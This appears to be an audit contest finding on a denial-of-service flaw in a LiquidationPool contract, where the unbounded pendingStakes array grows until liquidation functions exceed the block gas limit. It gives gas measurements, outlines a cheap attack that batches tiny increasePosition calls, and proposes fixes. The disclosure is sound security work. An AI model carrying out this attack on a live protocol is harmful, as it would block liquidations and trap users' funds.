LiquidationPool::pendingStakes
is an unbounded array that can be sufficiently populated to cause a denial of the liquidation service.
Pending stakes are added to the LiquidationPool
in increasePosition()
Every position increase is pushed into pendingStakes
, without restrictions on stake size.
The entire array of pendingStakes
is iterated through, with stakes older than one day transitioned to full stakes in consolidatePendingStakes()
No matter the size of pendingStakes
, every element is read from storage, with storage writes on their transition to full stakes.
When the pending stake transitions LiquidationPool::deletePendingStake()
performs another iteration over pendingStakes
LiquidationPool::consolidatePendingStakes()
is called in increasePosition()
, decreasePosition()
and distributeAssets()
, while distributeFees()
loops over pendingStakes
directly.
The size of dynamic pendingStakes
being unbounded (no limiting of length by the code), means it can grow to such a size that any calling function will revert due to out of gas or exceeding the block limit size.
If pendingStakes
grows to the problem size with one day, LiquidationPool
becomes unusable, as the functions to using pendingStakes
will revert.
LiquidationPool::distributeFees()
is part of the chain of call needed to perform the liquidation of under-collateralised vaults.
Gas usage result data has been generated using a Javascript test case
In hardhat.config.ts
Run from the project root using:
Altering the numberOfStakes
value when running the test and extracting the LiquidationPool
result provides the following summary:
When the # calls
to increasePosition
increases, the Max
gas consumed on each test also increases (in a linear time polynomial).
The increase is due to looping over the unbounded array, with one clear extrapolation: the block limit will be reached with enough calls to increasePosition
.
After 3,484 calls to LiquidationPool::increasePosition
the array of pending stakes will be large enough to cause any function using LiquidationPool::consolidatePendingStakes()
to exceed the Arbitum One block gas limit.
(This is excluding any potential affect of LiquidationPool::deletePendingStake()
)
The denial of liquidation services, prevents under-collateralised vaults from being able to liquidated,
in addition to all TST
and EUROs
held by the LiquidationPool
contract trapped within it.
While it is plausible that through organic traffic there could be 3.5K of stakers increasing their position,
lets focus on a malicious actor.
Increasing a position can be done for a single gwei
of either TST
or EUROs
plus gas.
The gas cost can be reduced by deploying a batching contract.
A batching contract would execute a loop of increasePosition
(a configurable number of times) in a single transaction,
making the attack relatively cheap and easy to execute, while also leaving no time for any preventative measures.
Being unable to complete a call to consolidatePendingStakes()
prevents reducing pendingStakes
size, with no other
function available, once the situation has occurred there is no escaping from it.
Manual Review, Hardhat test, Hardhat gas reporter
There are a few options, but your preference will have to include your appetite for redesign.
Considerations
Malicious actors
Honest stakers
o(n) gas scaling for increasing pending stake
o(n squared) scaling for deleting pending stake (as part of consolidatePendingStakes()
)
The quickest option, where a non-trivial amount of value is required for increasing stake.
Partial fix
Malicious actors: certain economic circumstances may warrant the addition cost in an attack
Fails to fix
Honest stakers
o(n) gas scaling for increasing pending stake
o(n squared) scaling for deleting pending stake (as part of consolidatePendingStakes()
)
Although a larger redesign could achieve sizable gas efficiencies, a minimal redesign reduces change risk.
Fixes
Malicious actors: liquidations can always go through
Partial fix
Honest stakers: increasing, decreasing and fee distribution could still be offline (requiring unsticking)
Fails to fix
o(n) gas scaling for increasing pending stake
o(n squared) scaling for deleting pending stake (as part of consolidatePendingStakes()
)
The liquidation process must be decoupled from the promoting of pending stakes to full stakes.
As the Liquidation is essential for maintaining the over-collateralisation of EUROs
, no part of the that flow
should be exposed to unbounded lops.
increasePosition()
, decreasePosition()
and distributeFees()
can all still be stuck due to pendingStakes
, but assuming these are non-critical
to operations, add a function to parse a sub-set of pendingStakes
. After one day anyone could then call the function to reduce the size of pendingStakes
by transition stakes that passed their deadline
.
Changes to both the process flow and underlying data structures, providing gas efficient scaling of the protocol.
Fixes
Malicious actors
Honest stakers
o(n) gas scaling for increasing pending stake
o(n squared) scaling for deleting pending stake (as part of consolidatePendingStakes()
)
Although the change set would be too extensive for this issue, the core ideas are:
Change the liquidation flow
Remove the pendingStakes
array
Add a FIFO queue of addresses
Add a mapping of addresses to an array of PendingStake
re-implement the logic of pendingStakes
dependent functions
The liquidation process must be decoupled from the promoting of pending stakes to full stakes.
Similar to the previous option, rather then tagging the processing onto other calls, provide a functions for the sole behaviour,
again with sub-set parsing to account for the potential unbounded set size.
The contents of pendingStakes
will be split into two parts, the FIFO queue and the address to PendingStake
mapping
First In First Out (FIFO) queue, e.g. Open Zeppelin Dequeue docs souce, as storage use is optimized, and all operations are O(1) constant time.
The ordering of the queue is by time, with the oldest pending stakes being the earliest entries, which allows for early exits in looping.
Mapping of address
to a dynamic array of PendingStake
, a store for the pending stakes by user.
Replace the pendingStakes
array with the new data structures
An example of the changes needed to LiquidationPool::increasePosition()
are to push the data onto the queue and mappings
Likewise throughout the code, the calling of consolidatePendingStakes()
need removing and instead external
functions allowing
consolidate by address (so keen users can update themselves) and a function for the consolidate a limited number of users,
as unbounded staker count an now be supported (practically there are storage limits).
The contest is live. Earn rewards by submitting a finding.
This is your time to appeal against judgements on your submissions.
Appeals are being carefully reviewed by our judges.